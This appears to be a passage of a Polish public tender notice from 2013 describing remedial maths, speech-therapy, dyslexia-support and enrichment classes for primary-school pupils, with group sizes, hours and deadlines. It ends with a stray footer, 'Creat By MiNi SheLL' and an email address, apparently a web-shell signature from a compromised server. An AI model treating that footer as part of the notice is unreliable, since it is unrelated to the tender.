a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej - wyrównanie braków w wiadomościach i umiejętnościach uczniów będących przyczyną ich trudności szkolnych, zachęcenie do zwiększenia wysiłku w uczeniu się matematyki, zniwelowanie przykrych doświadczeń związanych z porażkami w uczeniu się matematyki na lekcjach, zajęcia będą prowadzone w formie grupowej i zindywidualizowanej przez nauczyciela;
b) ilość uczestników - 9  uczniów podzielonych na 2 grupy  1 grupa 5 dzieci, 1 grupa 4 dzieci (4 dz. / 5 chł.) 
c) łączna ilość godzin - 60 godzin, każda po  45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy:
a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej prowadzone przez logopedę, które będą miały na celu skorygowanie wad wymowy, stymulowanie rozwoju mowy i języka tak, aby dzieci osiągnęły sprawność artykulacyjną, gramatyczną i leksykalną; 
b) ilość uczestników - 4  uczniów -  1 grupa  (4 chłopców)
c) łączna ilość godzin - 30 godzin, każda po 60 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia dodatkowe rozwijające zainteresowania dla dzieci uzdolnionych w dziedzinie matematyczno - przyrodniczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4: Zajęcia dodatkowe rozwijające zainteresowania dla dzieci uzdolnionych w dziedzinie matematyczno - przyrodniczej :

a) przedmiot zajęć: zajęcia w formie grupowej rozwijające umiejętności twórczego i logicznego myślenia, kształcenia wyobraźni i fantazji, umiejętności przetwarzania zdobytych wiadomości i twórczego ich modyfikowania poprzez dostrzeganie i rozwiązywanie problemów, rozbudzanie ciekawości poznawczej, wdrażanie ucznia do samodzielnej pracy i doskonalenia własnych metod uczenia się;
b) ilość uczestników - 8  uczniów -  1 grupa  (5 dz./3 chł.)
c) łączna ilość godzin - 30 godzin, każda po 45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia korekcyjno - kompensacyjne dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoła Podstawowa im. KEN w Nielubi

Część 5: Zajęcia korekcyjno - kompensacyjne dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji :
a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej - zniwelowanie trudności i niepowodzeń szkolnych poprzez usprawnienie percepcji słuchowej, wzrokowej, ćwiczenie koordynacji wzrokowo - ruchowej i sprawności manualnej, doskonalenie techniki czytania, utrwalenia zasad pisowni, stworzenie możliwości wszechstronnego rozwoju umysłowego, psychicznego i społecznego uczniów z
utrudnieniami rozwojowymi, na miarę ich możliwości, usprawnienie w zakresie funkcjonowania systemu percepcyjno- motorycznego, podniesienie poziomu sprawności językowej w zakresie mówienia, pisania i czytania;
b) ilość uczestników: 15  uczniów podzielonych na 3 grupy  -1 grupa 5  dzieci, 1 grupa 5 dzieci, 1 grupa 5 dzieci (7 dz. / 8 chł.)
c)  łączna ilość godzin - 90 godzin, każda po  45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia dydaktyczno - wyrównawcze dla dzieci z zaburzeniami umiejętności matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6: Zajęcia dydaktyczno - wyrównawcze dla dzieci z zaburzeniami umiejętności matematycznych :

a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej - wyrównanie braków w wiadomościach i umiejętnościach uczniów będących przyczyną ich trudności szkolnych, zachęcenie do zwiększenia wysiłku w uczeniu się matematyki, zniwelowanie przykrych doświadczeń związanych z porażkami w uczeniu się matematyki na lekcjach, zajęcia będą prowadzone w formie grupowej i zindywidualizowanej przez nauczyciela;
b) ilość uczestników - 22  uczniów podzielonych na 3 grupy -  1 grupa 7  dzieci, 1 grupa 7 dzieci, 1 grupa 8 dzieci (9 dz. / 13 chł.)  
c) łączna ilość godzin - 90 godzin, każda po  45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 7: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy:
a) przedmiot zajęć: zajęcia w formie grupowej i zindywidualizowanej prowadzone przez logopedę, które będą miały na celu skorygowanie wad wymowy, stymulowanie rozwoju mowy i języka tak, aby dzieci osiągnęły sprawność artykulacyjną, gramatyczną i leksykalną; 
b) ilość uczestników - 4  uczniów -  1 grupa  (2  dz./2 chł.)
c) łączna ilość godzin - 30 godzin, każda po 60 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia dodatkowe rozwijające zainteresowania dla dzieci uzdolnionych w dziedzinie matematyczno - przyrodniczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 8: Zajęcia dodatkowe rozwijające zainteresowania dla dzieci uzdolnionych w dziedzinie matematyczno - przyrodniczej :
a) przedmiot zajęć: zajęcia w formie grupowej rozwijające umiejętności twórczego i logicznego myślenia, kształcenia wyobraźni i fantazji, umiejętności przetwarzania zdobytych wiadomości i twórczego ich modyfikowania poprzez dostrzeganie i rozwiązywanie problemów, rozbudzanie ciekawości poznawczej, wdrażanie ucznia do samodzielnej pracy i doskonalenia własnych metod uczenia się;
b) ilość uczestników - 8  uczniów -  1 grupa  (4 dz./4 chł.)
c) łączna ilość godzin - 30 godzin, każda po 45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com